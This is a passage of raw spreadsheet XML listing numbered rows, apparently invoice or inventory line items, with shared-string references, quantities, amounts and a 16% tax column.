      <c r="C690" s="238" t="s">
        <v>6483</v>
      </c>
      <c r="D690" s="238" t="s">
        <v>6484</v>
      </c>
      <c r="E690" s="238" t="s">
        <v>6485</v>
      </c>
      <c r="F690" s="238" t="s">
        <v>6486</v>
      </c>
      <c r="G690" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H690" s="10">
        <v>1</v>
      </c>
      <c r="I690" s="14">
        <v>1260.68</v>
      </c>
      <c r="J690" s="15">
        <v>201.7088</v>
      </c>
      <c r="K690" s="16"/>
    </row>
    <row r="691" spans="2:11">
      <c r="B691" s="9">
        <v>718</v>
      </c>
      <c r="C691" s="238" t="s">
        <v>6487</v>
      </c>
      <c r="D691" s="238" t="s">
        <v>6488</v>
      </c>
      <c r="E691" s="238" t="s">
        <v>6485</v>
      </c>
      <c r="F691" s="238" t="s">
        <v>6489</v>
      </c>
      <c r="G691" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H691" s="10">
        <v>1</v>
      </c>
      <c r="I691" s="14">
        <v>6440.17</v>
      </c>
      <c r="J691" s="15">
        <v>1030.4272</v>
      </c>
      <c r="K691" s="16"/>
    </row>
    <row r="692" spans="2:11">
      <c r="B692" s="9">
        <v>719</v>
      </c>
      <c r="C692" s="238" t="s">
        <v>6490</v>
      </c>
      <c r="D692" s="238" t="s">
        <v>6491</v>
      </c>
      <c r="E692" s="238" t="s">
        <v>6485</v>
      </c>
      <c r="F692" s="238" t="s">
        <v>6492</v>
      </c>
      <c r="G692" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H692" s="10">
        <v>3</v>
      </c>
      <c r="I692" s="14">
        <v>1641.02</v>
      </c>
      <c r="J692" s="15">
        <v>262.5648</v>
      </c>
      <c r="K692" s="16"/>
    </row>
    <row r="693" spans="2:11">
      <c r="B693" s="9">
        <v>720</v>
      </c>
      <c r="C693" s="238" t="s">
        <v>6493</v>
      </c>
      <c r="D693" s="238" t="s">
        <v>6484</v>
      </c>
      <c r="E693" s="238" t="s">
        <v>6485</v>
      </c>
      <c r="F693" s="238" t="s">
        <v>6494</v>
      </c>
      <c r="G693" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H693" s="10">
        <v>3</v>
      </c>
      <c r="I693" s="14">
        <v>2115.38</v>
      </c>
      <c r="J693" s="15">
        <v>338.4624</v>
      </c>
      <c r="K693" s="16"/>
    </row>
    <row r="694" spans="2:11">
      <c r="B694" s="9">
        <v>721</v>
      </c>
      <c r="C694" s="238" t="s">
        <v>6495</v>
      </c>
      <c r="D694" s="238" t="s">
        <v>6484</v>
      </c>
      <c r="E694" s="238" t="s">
        <v>6485</v>
      </c>
      <c r="F694" s="238" t="s">
        <v>764</v>
      </c>
      <c r="G694" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H694" s="10">
        <v>2</v>
      </c>
      <c r="I694" s="14">
        <v>5196.29</v>
      </c>
      <c r="J694" s="15">
        <v>831.408</v>
      </c>
      <c r="K694" s="16"/>
    </row>
    <row r="695" spans="2:11">
      <c r="B695" s="9">
        <v>722</v>
      </c>
      <c r="C695" s="238" t="s">
        <v>6496</v>
      </c>
      <c r="D695" s="238" t="s">
        <v>6484</v>
      </c>
      <c r="E695" s="238" t="s">
        <v>6485</v>
      </c>
      <c r="F695" s="238" t="s">
        <v>6497</v>
      </c>
      <c r="G695" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H695" s="10">
        <v>1</v>
      </c>
      <c r="I695" s="14">
        <v>1666.66</v>
      </c>
      <c r="J695" s="15">
        <v>266.6656</v>
      </c>
      <c r="K695" s="16"/>
    </row>
    <row r="696" spans="2:11">
      <c r="B696" s="9">
        <v>723</v>
      </c>
      <c r="C696" s="238" t="s">
        <v>6498</v>
      </c>
      <c r="D696" s="238" t="s">
        <v>6484</v>
      </c>
      <c r="E696" s="238" t="s">
        <v>6433</v>
      </c>
      <c r="F696" s="238" t="s">
        <v>6499</v>
      </c>
      <c r="G696" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H696" s="10">
        <v>1</v>
      </c>
      <c r="I696" s="14">
        <v>4219.66</v>
      </c>
      <c r="J696" s="15">
        <v>675.1456</v>
      </c>
      <c r="K696" s="16"/>
    </row>
    <row r="697" spans="2:11">
      <c r="B697" s="9">
        <v>724</v>
      </c>
      <c r="C697" s="238" t="s">
        <v>6500</v>
      </c>
      <c r="D697" s="238" t="s">
        <v>6501</v>
      </c>
      <c r="E697" s="238" t="s">
        <v>6502</v>
      </c>
      <c r="F697" s="238" t="s">
        <v>6503</v>
      </c>
      <c r="G697" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H697" s="10">
        <v>2</v>
      </c>
      <c r="I697" s="14">
        <v>165.16</v>
      </c>
      <c r="J697" s="15">
        <v>26.4256</v>
      </c>
      <c r="K697" s="16"/>
    </row>
    <row r="698" spans="2:11">
      <c r="B698" s="9">
        <v>725</v>
      </c>
      <c r="C698" s="238" t="s">
        <v>6504</v>
      </c>
      <c r="D698" s="238" t="s">
        <v>6505</v>
      </c>
      <c r="E698" s="238" t="s">
        <v>6506</v>
      </c>
      <c r="F698" s="238" t="s">
        <v>6434</v>
      </c>
      <c r="G698" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H698" s="10">
        <v>2</v>
      </c>
      <c r="I698" s="14">
        <v>2240.63</v>
      </c>
      <c r="J698" s="15">
        <v>358.5024</v>
      </c>
      <c r="K698" s="16"/>
    </row>
    <row r="699" spans="2:11">
      <c r="B699" s="9">
        <v>726</v>
      </c>
      <c r="C699" s="238" t="s">
        <v>6507</v>
      </c>
      <c r="D699" s="238" t="s">
        <v>6508</v>
      </c>
      <c r="E699" s="238" t="s">
        <v>6509</v>
      </c>
      <c r="F699" s="238" t="s">
        <v>6510</v>
      </c>
      <c r="G699" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H699" s="10">
        <v>8</v>
      </c>
      <c r="I699" s="14">
        <v>679.8</v>
      </c>
      <c r="J699" s="15">
        <v>108.7744</v>
      </c>
      <c r="K699" s="16"/>
    </row>
    <row r="700" spans="2:11">
      <c r="B700" s="9">
        <v>727</v>
      </c>
      <c r="C700" s="238" t="s">
        <v>6511</v>
      </c>
      <c r="D700" s="238" t="s">
        <v>6512</v>
      </c>
      <c r="E700" s="238" t="s">
        <v>6513</v>
      </c>
      <c r="F700" s="238" t="s">
        <v>6514</v>
      </c>
      <c r="G700" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H700" s="10">
        <v>1</v>
      </c>
      <c r="I700" s="14">
        <v>829.06</v>
      </c>
      <c r="J700" s="15">
        <v>132.6496</v>
      </c>
      <c r="K700" s="16"/>
    </row>
    <row r="701" spans="2:11">
      <c r="B701" s="9">
        <v>728</v>
      </c>
      <c r="C701" s="238" t="s">
        <v>6515</v>
      </c>
      <c r="D701" s="238" t="s">
        <v>6516</v>
      </c>
      <c r="E701" s="238" t="s">
        <v>6513</v>
      </c>
      <c r="F701" s="238" t="s">
        <v>6355</v>
      </c>
      <c r="G701" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H701" s="10">
        <v>1</v>
      </c>
      <c r="I701" s="14">
        <v>32.48</v>
      </c>
      <c r="J701" s="15">
        <v>5.1968</v>
      </c>
      <c r="K701" s="16"/>
    </row>
    <row r="702" spans="2:11">
      <c r="B702" s="9">
        <v>729</v>
      </c>
      <c r="C702" s="238" t="s">
        <v>6517</v>
      </c>
      <c r="D702" s="238" t="s">
        <v>6518</v>
      </c>
      <c r="E702" s="238" t="s">
        <v>6420</v>
      </c>
      <c r="F702" s="238" t="s">
        <v>6519</v>
      </c>
      <c r="G702" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H702" s="10">
        <v>2</v>
      </c>
      <c r="I702" s="14">
        <v>9556.15</v>
      </c>
      <c r="J702" s="15">
        <v>1528.9856</v>
      </c>
      <c r="K702" s="16"/>
    </row>
    <row r="703" spans="2:11">
      <c r="B703" s="9">
        <v>730</v>
      </c>
      <c r="C703" s="238" t="s">
        <v>6520</v>
      </c>
      <c r="D703" s="238" t="s">
        <v>6521</v>
      </c>
      <c r="E703" s="238" t="s">
        <v>6479</v>
      </c>
      <c r="F703" s="238" t="s">
        <v>6522</v>
      </c>
      <c r="G703" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H703" s="10">
        <v>2</v>
      </c>
      <c r="I703" s="14">
        <v>1681.08</v>
      </c>
      <c r="J703" s="15">
        <v>268.9728</v>
      </c>
      <c r="K703" s="16"/>
    </row>
    <row r="704" spans="2:11">
      <c r="B704" s="9">
        <v>731</v>
      </c>
      <c r="C704" s="238" t="s">
        <v>6523</v>
      </c>
      <c r="D704" s="238" t="s">
        <v>6524</v>
      </c>
      <c r="E704" s="238" t="s">
        <v>6525</v>
      </c>
      <c r="F704" s="238" t="s">
        <v>1960</v>
      </c>
      <c r="G704" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H704" s="10">
        <v>1</v>
      </c>
      <c r="I704" s="14">
        <v>3620.08</v>
      </c>
      <c r="J704" s="15">
        <v>579.2128</v>
      </c>
      <c r="K704" s="16"/>
    </row>
    <row r="705" spans="2:11">
      <c r="B705" s="9">
        <v>732</v>
      </c>
      <c r="C705" s="238" t="s">
        <v>6526</v>
      </c>
      <c r="D705" s="238" t="s">
        <v>6527</v>
      </c>
      <c r="E705" s="238" t="s">
        <v>6528</v>
      </c>
      <c r="F705" s="238" t="s">
        <v>6529</v>
      </c>
      <c r="G705" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H705" s="10">
        <v>1</v>
      </c>
      <c r="I705" s="14">
        <v>4433.15</v>
      </c>
      <c r="J705" s="15">
        <v>709.304</v>
      </c>
      <c r="K705" s="16"/>
    </row>
    <row r="706" spans="2:11">
      <c r="B706" s="9">
        <v>733</v>
      </c>
      <c r="C706" s="238" t="s">
        <v>6530</v>
      </c>
      <c r="D706" s="238" t="s">
        <v>6531</v>
      </c>
      <c r="E706" s="238" t="s">
        <v>6532</v>
      </c>
      <c r="F706" s="238" t="s">
        <v>6533</v>
      </c>
      <c r="G706" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H706" s="10">
        <v>2</v>
      </c>
      <c r="I706" s="14">
        <v>1228.71</v>
      </c>
      <c r="J706" s="15">
        <v>196.5952</v>
      </c>
      <c r="K706" s="16"/>
    </row>
    <row r="707" spans="2:11">
      <c r="B707" s="9">
        <v>734</v>
      </c>
      <c r="C707" s="238" t="s">
        <v>6534</v>
      </c>
      <c r="D707" s="238" t="s">
        <v>6535</v>
      </c>
      <c r="E707" s="238" t="s">
        <v>6528</v>
      </c>
      <c r="F707" s="238" t="s">
        <v>6536</v>
      </c>
      <c r="G707" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H707" s="10">
        <v>1</v>
      </c>
      <c r="I707" s="14">
        <v>4215.09</v>
      </c>
      <c r="J707" s="15">
        <v>674.4144</v>
      </c>
      <c r="K707" s="16"/>
    </row>
    <row r="708" spans="2:11">
      <c r="B708" s="9">
        <v>735</v>
      </c>
      <c r="C708" s="238" t="s">
        <v>6537</v>
      </c>
      <c r="D708" s="238" t="s">
        <v>6531</v>
      </c>
      <c r="E708" s="238" t="s">
        <v>6532</v>
      </c>
      <c r="F708" s="238" t="s">
        <v>6456</v>
      </c>
      <c r="G708" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H708" s="10">
        <v>1</v>
      </c>
      <c r="I708" s="14">
        <v>7641.03</v>
      </c>
      <c r="J708" s="15">
        <v>1222.5648</v>
      </c>
      <c r="K708" s="16"/>
    </row>
    <row r="709" spans="2:11">
      <c r="B709" s="9">
        <v>736</v>
      </c>
      <c r="C709" s="238" t="s">
        <v>6538</v>
      </c>
      <c r="D709" s="238" t="s">
        <v>6539</v>
      </c>
      <c r="E709" s="238" t="s">
        <v>6532</v>
      </c>
      <c r="F709" s="238" t="s">
        <v>6476</v>
      </c>
      <c r="G709" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H709" s="10">
        <v>1</v>
      </c>
      <c r="I709" s="14">
        <v>1495.72</v>
      </c>
      <c r="J709" s="15">
        <v>239.3152</v>
      </c>
      <c r="K709" s="16"/>
    </row>
    <row r="710" spans="2:11">
      <c r="B710" s="9">
        <v>737</v>
      </c>
      <c r="C710" s="238" t="s">
        <v>6540</v>
      </c>
      <c r="D710" s="238" t="s">
        <v>6531</v>
      </c>
      <c r="E710" s="238" t="s">
        <v>6532</v>
      </c>
      <c r="F710" s="238" t="s">
        <v>6541</v>
      </c>
      <c r="G710" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H710" s="10">
        <v>1</v>
      </c>
      <c r="I710" s="14">
        <v>5133.91</v>
      </c>
      <c r="J710" s="15">
        <v>821.4256</v>
      </c>
      <c r="K710" s="16"/>
    </row>
    <row r="711" spans="2:11">
      <c r="B711" s="9">
        <v>738</v>
      </c>
      <c r="C711" s="238" t="s">
        <v>6542</v>
      </c>
      <c r="D711" s="238" t="s">
        <v>6543</v>
      </c>
      <c r="E711" s="238" t="s">
        <v>6433</v>
      </c>
      <c r="F711" s="238" t="s">
        <v>6544</v>
      </c>
      <c r="G711" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H711" s="10">
        <v>2</v>
      </c>
      <c r="I711" s="14">
        <v>8182.97</v>
      </c>
      <c r="J711" s="15">
        <v>1309.2768</v>
      </c>
      <c r="K711" s="16"/>
    </row>
    <row r="712" spans="2:11">
      <c r="B712" s="9">
        <v>739</v>
      </c>
      <c r="C712" s="238" t="s">
        <v>6545</v>
      </c>
      <c r="D712" s="238" t="s">
        <v>6546</v>
      </c>
      <c r="E712" s="238" t="s">
        <v>6547</v>
      </c>
      <c r="F712" s="238" t="s">
        <v>6548</v>
      </c>
      <c r="G712" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H712" s="10">
        <v>1</v>
      </c>
      <c r="I712" s="14">
        <v>5269.23</v>
      </c>
      <c r="J712" s="15">
        <v>843.0768</v>
      </c>
      <c r="K712" s="16"/>
    </row>
    <row r="713" spans="2:11">
      <c r="B713" s="9">
        <v>740</v>
      </c>
      <c r="C713" s="238" t="s">
        <v>6549</v>
      </c>
      <c r="D713" s="238" t="s">
        <v>6432</v>
      </c>
      <c r="E713" s="238" t="s">
        <v>6532</v>
      </c>
      <c r="F713" s="238" t="s">
        <v>2187</v>
      </c>
      <c r="G713" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H713" s="10">
        <v>1</v>
      </c>
      <c r="I713" s="14">
        <v>470.09</v>
      </c>
      <c r="J713" s="15">
        <v>75.2144</v>
      </c>
      <c r="K713" s="16"/>
    </row>
    <row r="714" spans="2:11">
      <c r="B714" s="9">
        <v>741</v>
      </c>
      <c r="C714" s="238" t="s">
        <v>6550</v>
      </c>
      <c r="D714" s="238" t="s">
        <v>6539</v>
      </c>
      <c r="E714" s="238" t="s">
        <v>6532</v>
      </c>
      <c r="F714" s="238" t="s">
        <v>6551</v>
      </c>
      <c r="G714" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H714" s="10">
        <v>12</v>
      </c>
      <c r="I714" s="14">
        <v>2487.66</v>
      </c>
      <c r="J714" s="15">
        <v>398.0352</v>
      </c>
      <c r="K714" s="16"/>
    </row>
    <row r="715" spans="2:11">
      <c r="B715" s="9">
        <v>742</v>
      </c>
      <c r="C715" s="238" t="s">
        <v>6552</v>
      </c>
      <c r="D715" s="238" t="s">
        <v>6432</v>
      </c>
      <c r="E715" s="238" t="s">
        <v>6532</v>
      </c>
      <c r="F715" s="238" t="s">
        <v>6553</v>
      </c>
      <c r="G715" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H715" s="10">
        <v>2</v>
      </c>
      <c r="I715" s="14">
        <v>307.63</v>
      </c>
      <c r="J715" s="15">
        <v>49.2224</v>
      </c>
      <c r="K715" s="16"/>
    </row>
    <row r="716" spans="2:11">
      <c r="B716" s="9">
        <v>743</v>
      </c>
      <c r="C716" s="238" t="s">
        <v>6554</v>
      </c>
      <c r="D716" s="238" t="s">
        <v>6531</v>
      </c>
      <c r="E716" s="238" t="s">
        <v>6433</v>
      </c>
      <c r="F716" s="238" t="s">
        <v>6555</v>
      </c>
      <c r="G716" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H716" s="10">
        <v>2</v>
      </c>
      <c r="I716" s="14">
        <v>418.81</v>
      </c>
      <c r="J716" s="15">
        <v>67.0112</v>
      </c>
      <c r="K716" s="16"/>
    </row>
    <row r="717" spans="2:11">
      <c r="B717" s="9">
        <v>744</v>
      </c>
      <c r="C717" s="238" t="s">
        <v>6556</v>
      </c>
      <c r="D717" s="238" t="s">
        <v>6557</v>
      </c>
      <c r="E717" s="238" t="s">
        <v>6558</v>
      </c>
      <c r="F717" s="238" t="s">
        <v>6503</v>
      </c>
      <c r="G717" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H717" s="10">
        <v>1</v>
      </c>
      <c r="I717" s="14">
        <v>820.51</v>
      </c>
      <c r="J717" s="15">
        <v>131.2816</v>
      </c>
      <c r="K717" s="16"/>
    </row>
    <row r="718" spans="2:11">
      <c r="B718" s="9">
        <v>745</v>
      </c>
      <c r="C718" s="238" t="s">
        <v>6559</v>
      </c>
      <c r="D718" s="238" t="s">
        <v>6560</v>
      </c>
      <c r="E718" s="238" t="s">
        <v>6561</v>
      </c>
      <c r="F718" s="238" t="s">
        <v>2181</v>
      </c>
      <c r="G718" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H718" s="10">
        <v>3</v>
      </c>
      <c r="I718" s="14">
        <v>1923.08</v>
      </c>
      <c r="J718" s="15">
        <v>307.6944</v>
      </c>
      <c r="K718" s="16"/>
    </row>
    <row r="719" spans="2:11">
      <c r="B719" s="9">
        <v>746</v>
      </c>
      <c r="C719" s="238" t="s">
        <v>6562</v>
      </c>
      <c r="D719" s="238" t="s">
        <v>6563</v>
      </c>
      <c r="E719" s="238" t="s">
        <v>4561</v>
      </c>
      <c r="F719" s="238" t="s">
        <v>6564</v>
      </c>
      <c r="G719" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H719" s="10">
        <v>1</v>
      </c>
      <c r="I719" s="14">
        <v>404.28</v>
      </c>
      <c r="J719" s="15">
        <v>64.6848</v>
      </c>
      <c r="K719" s="16"/>
    </row>
    <row r="720" spans="2:11">
      <c r="B720" s="9">
        <v>747</v>
      </c>
      <c r="C720" s="238" t="s">
        <v>6565</v>
      </c>
      <c r="D720" s="238" t="s">
        <v>6566</v>
      </c>
      <c r="E720" s="238" t="s">
        <v>4561</v>
      </c>
      <c r="F720" s="238" t="s">
        <v>6567</v>
      </c>
      <c r="G720" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H720" s="10">
        <v>4</v>
      </c>
      <c r="I720" s="14">
        <v>2591.45</v>
      </c>
      <c r="J720" s="15">
        <v>414.6304</v>
      </c>
      <c r="K720" s="16"/>
    </row>
    <row r="721" spans="2:11">
      <c r="B721" s="9">
        <v>748</v>
      </c>
      <c r="C721" s="238" t="s">
        <v>6568</v>
      </c>
      <c r="D721" s="238" t="s">
        <v>6569</v>
      </c>
      <c r="E721" s="238" t="s">
        <v>6570</v>
      </c>
      <c r="F721" s="9"/>
      <c r="G721" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H721" s="10">
        <v>1</v>
      </c>
      <c r="I721" s="14">
        <v>6923.08</v>
      </c>
      <c r="J721" s="15">
        <v>1107.6928</v>
      </c>
      <c r="K721" s="16"/>
    </row>
    <row r="722" spans="2:11">
      <c r="B722" s="9">
        <v>749</v>
      </c>
      <c r="C722" s="238" t="s">
        <v>6571</v>
      </c>
      <c r="D722" s="238" t="s">
        <v>6572</v>
      </c>
      <c r="E722" s="238" t="s">
        <v>6573</v>
      </c>
      <c r="F722" s="9"/>
      <c r="G722" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H722" s="10">
        <v>1</v>
      </c>
      <c r="I722" s="14">
        <v>726.5</v>
      </c>
      <c r="J722" s="15">
        <v>116.24</v>
      </c>
      <c r="K722" s="16"/>
    </row>
    <row r="723" spans="2:11">
      <c r="B723" s="9">
        <v>750</v>
      </c>
      <c r="C723" s="238" t="s">
        <v>6574</v>
      </c>
      <c r="D723" s="238" t="s">
        <v>6575</v>
      </c>
      <c r="E723" s="238" t="s">
        <v>4561</v>
      </c>
      <c r="F723" s="238" t="s">
        <v>6576</v>
      </c>
      <c r="G723" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H723" s="10">
        <v>3</v>
      </c>
      <c r="I723" s="14">
        <v>2769.23</v>
      </c>
      <c r="J723" s="15">
        <v>443.0784</v>
      </c>
      <c r="K723" s="16"/>
    </row>
    <row r="724" spans="2:11">
      <c r="B724" s="9">
        <v>751</v>
      </c>
      <c r="C724" s="238" t="s">
        <v>6577</v>
      </c>
      <c r="D724" s="238" t="s">
        <v>6578</v>
      </c>
      <c r="E724" s="238" t="s">
        <v>6579</v>
      </c>
      <c r="F724" s="238" t="s">
        <v>6580</v>
      </c>
      <c r="G724" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H724" s="10">
        <v>2</v>
      </c>
      <c r="I724" s="14">
        <v>1589.74</v>
      </c>
      <c r="J724" s="15">
        <v>254.3584</v>
      </c>
      <c r="K724" s="16"/>
    </row>
    <row r="725" spans="2:11">
      <c r="B725" s="9">
        <v>752</v>
      </c>
      <c r="C725" s="238" t="s">
        <v>6581</v>
      </c>
      <c r="D725" s="238" t="s">
        <v>6582</v>
      </c>
      <c r="E725" s="238" t="s">
        <v>6583</v>
      </c>
      <c r="F725" s="238" t="s">
        <v>4035</v>
      </c>
      <c r="G725" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H725" s="10">
        <v>1</v>
      </c>
      <c r="I725" s="14">
        <v>3675.21</v>
      </c>
      <c r="J725" s="15">
        <v>588.0336</v>
      </c>
      <c r="K725" s="16"/>
    </row>
    <row r="726" spans="2:11">
      <c r="B726" s="9">
        <v>753</v>
      </c>
      <c r="C726" s="238" t="s">
        <v>6584</v>
      </c>
      <c r="D726" s="238" t="s">
        <v>6585</v>
      </c>
      <c r="E726" s="238" t="s">
        <v>6586</v>
      </c>
      <c r="F726" s="238" t="s">
        <v>6548</v>
      </c>
      <c r="G726" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H726" s="10">
        <v>5</v>
      </c>
      <c r="I726" s="14">
        <v>77.78</v>
      </c>
      <c r="J726" s="15">
        <v>12.448</v>
      </c>
      <c r="K726" s="16"/>
    </row>
    <row r="727" spans="2:11">
      <c r="B727" s="9">
        <v>754</v>
      </c>
      <c r="C727" s="238" t="s">
        <v>6587</v>
      </c>
      <c r="D727" s="238" t="s">
        <v>6588</v>
      </c>
      <c r="E727" s="238" t="s">
        <v>6586</v>
      </c>
      <c r="F727" s="238" t="s">
        <v>6589</v>
      </c>
      <c r="G727" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H727" s="10">
        <v>4</v>
      </c>
      <c r="I727" s="14">
        <v>365.38</v>
      </c>
      <c r="J727" s="15">
        <v>58.464</v>
      </c>
      <c r="K727" s="16"/>
    </row>
    <row r="728" spans="2:11">
      <c r="B728" s="9">
        <v>755</v>
      </c>
      <c r="C728" s="238" t="s">
        <v>6590</v>
      </c>
      <c r="D728" s="238" t="s">
        <v>6591</v>
      </c>
      <c r="E728" s="238" t="s">
        <v>6586</v>
      </c>
      <c r="F728" s="238" t="s">
        <v>708</v>
      </c>
      <c r="G728" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H728" s="10">
        <v>1</v>
      </c>
      <c r="I728" s="14">
        <v>264.96</v>
      </c>
      <c r="J728" s="15">
        <v>42.3936</v>
      </c>
      <c r="K728" s="16"/>
    </row>
    <row r="729" spans="2:11">
      <c r="B729" s="9">
        <v>756</v>
      </c>
      <c r="C729" s="238" t="s">
        <v>6592</v>
      </c>
      <c r="D729" s="238" t="s">
        <v>6593</v>
      </c>
      <c r="E729" s="238" t="s">
        <v>6594</v>
      </c>
      <c r="F729" s="238" t="s">
        <v>6595</v>
      </c>
      <c r="G729" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H729" s="10">
        <v>3</v>
      </c>
      <c r="I729" s="14">
        <v>551.28</v>
      </c>
      <c r="J729" s="15">
        <v>88.2048</v>
      </c>
      <c r="K729" s="16"/>
    </row>
    <row r="730" spans="2:11">
      <c r="B730" s="9">
        <v>757</v>
      </c>
      <c r="C730" s="238" t="s">
        <v>6596</v>
      </c>
      <c r="D730" s="238" t="s">
        <v>6597</v>
      </c>
      <c r="E730" s="238" t="s">
        <v>6598</v>
      </c>
      <c r="F730" s="238" t="s">
        <v>6599</v>
      </c>
      <c r="G730" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H730" s="10">
        <v>2</v>
      </c>
      <c r="I730" s="14">
        <v>257.61</v>
      </c>
      <c r="J730" s="15">
        <v>41.2192</v>
      </c>
      <c r="K730" s="16"/>
    </row>
    <row r="731" spans="2:11">
      <c r="B731" s="9">
        <v>758</v>
      </c>
      <c r="C731" s="238" t="s">
        <v>6600</v>
      </c>
      <c r="D731" s="238" t="s">
        <v>6601</v>
      </c>
      <c r="E731" s="238" t="s">
        <v>6586</v>
      </c>
      <c r="F731" s="238" t="s">
        <v>2178</v>
      </c>
      <c r="G731" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H731" s="10">
        <v>4</v>
      </c>
      <c r="I731" s="14">
        <v>185.57</v>
      </c>
      <c r="J731" s="15">
        <v>29.6896</v>
      </c>
      <c r="K731" s="16"/>
    </row>
    <row r="732" spans="2:11">
      <c r="B732" s="9">
        <v>759</v>
      </c>
      <c r="C732" s="238" t="s">
        <v>6602</v>
      </c>
      <c r="D732" s="238" t="s">
        <v>6588</v>
      </c>
      <c r="E732" s="238" t="s">
        <v>6586</v>
      </c>
      <c r="F732" s="238" t="s">
        <v>6503</v>
      </c>
      <c r="G732" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H732" s="10">
        <v>3</v>
      </c>
      <c r="I732" s="14">
        <v>37.82</v>
      </c>
      <c r="J732" s="15">
        <v>6.0528</v>
      </c>
      <c r="K732" s="16"/>
    </row>
    <row r="733" spans="2:11">
      <c r="B733" s="9">
        <v>760</v>
      </c>
      <c r="C733" s="238" t="s">
        <v>6603</v>
      </c>
      <c r="D733" s="238" t="s">
        <v>6588</v>
      </c>
      <c r="E733" s="238" t="s">
        <v>6586</v>
      </c>
      <c r="F733" s="238" t="s">
        <v>6320</v>
      </c>
      <c r="G733" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H733" s="10">
        <v>1</v>
      </c>
      <c r="I733" s="14">
        <v>9.04</v>
      </c>
      <c r="J733" s="15">
        <v>1.4464</v>
      </c>
      <c r="K733" s="16"/>
    </row>
    <row r="734" spans="2:11">
      <c r="B734" s="9">
        <v>761</v>
      </c>
      <c r="C734" s="238" t="s">
        <v>6604</v>
      </c>
      <c r="D734" s="238" t="s">
        <v>6588</v>
      </c>
      <c r="E734" s="238" t="s">
        <v>6586</v>
      </c>
      <c r="F734" s="238" t="s">
        <v>6605</v>
      </c>
      <c r="G734" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H734" s="10">
        <v>1</v>
      </c>
      <c r="I734" s="14">
        <v>38.46</v>
      </c>
      <c r="J734" s="15">
        <v>6.1536</v>
      </c>
      <c r="K734" s="16"/>
    </row>
    <row r="735" spans="2:11">
      <c r="B735" s="9">
        <v>762</v>
      </c>
      <c r="C735" s="238" t="s">
        <v>6606</v>
      </c>
      <c r="D735" s="238" t="s">
        <v>6607</v>
      </c>
      <c r="E735" s="238" t="s">
        <v>6586</v>
      </c>
      <c r="F735" s="238" t="s">
        <v>6608</v>
      </c>
      <c r="G735" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H735" s="10">
        <v>2</v>
      </c>
      <c r="I735" s="14">
        <v>1045</v>
      </c>
      <c r="J735" s="15">
        <v>167.2</v>
      </c>
      <c r="K735" s="16"/>
    </row>
    <row r="736" spans="2:11">
      <c r="B736" s="9">
        <v>763</v>
      </c>
      <c r="C736" s="238" t="s">
        <v>6609</v>
      </c>
      <c r="D736" s="238" t="s">
        <v>6360</v>
      </c>
      <c r="E736" s="238" t="s">
        <v>6610</v>
      </c>
      <c r="F736" s="238" t="s">
        <v>2181</v>
      </c>
      <c r="G736" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H736" s="10">
        <v>2</v>
      </c>
      <c r="I736" s="14">
        <v>335.44</v>
      </c>
      <c r="J736" s="15">
        <v>53.6704</v>
      </c>
      <c r="K736" s="16"/>
    </row>
    <row r="737" spans="2:11">
      <c r="B737" s="9">
        <v>764</v>
      </c>
      <c r="C737" s="238" t="s">
        <v>6611</v>
      </c>
      <c r="D737" s="238" t="s">
        <v>6360</v>
      </c>
      <c r="E737" s="238" t="s">
        <v>6612</v>
      </c>
      <c r="F737" s="238" t="s">
        <v>6355</v>
      </c>
      <c r="G737" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H737" s="10">
        <v>1</v>
      </c>
      <c r="I737" s="14">
        <v>166.66</v>
      </c>
      <c r="J737" s="15">
        <v>26.6656</v>
      </c>
      <c r="K737" s="16"/>
    </row>
    <row r="738" spans="2:11">
      <c r="B738" s="9">
        <v>765</v>
      </c>
      <c r="C738" s="238" t="s">
        <v>6613</v>
      </c>
      <c r="D738" s="238" t="s">
        <v>6614</v>
      </c>
      <c r="E738" s="238" t="s">
        <v>6586</v>
      </c>
      <c r="F738" s="238" t="s">
        <v>764</v>
      </c>
      <c r="G738" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H738" s="10">
        <v>1</v>
      </c>
      <c r="I738" s="14">
        <v>33.39</v>
      </c>
      <c r="J738" s="15">
        <v>5.3424</v>
      </c>
      <c r="K738" s="16"/>
    </row>
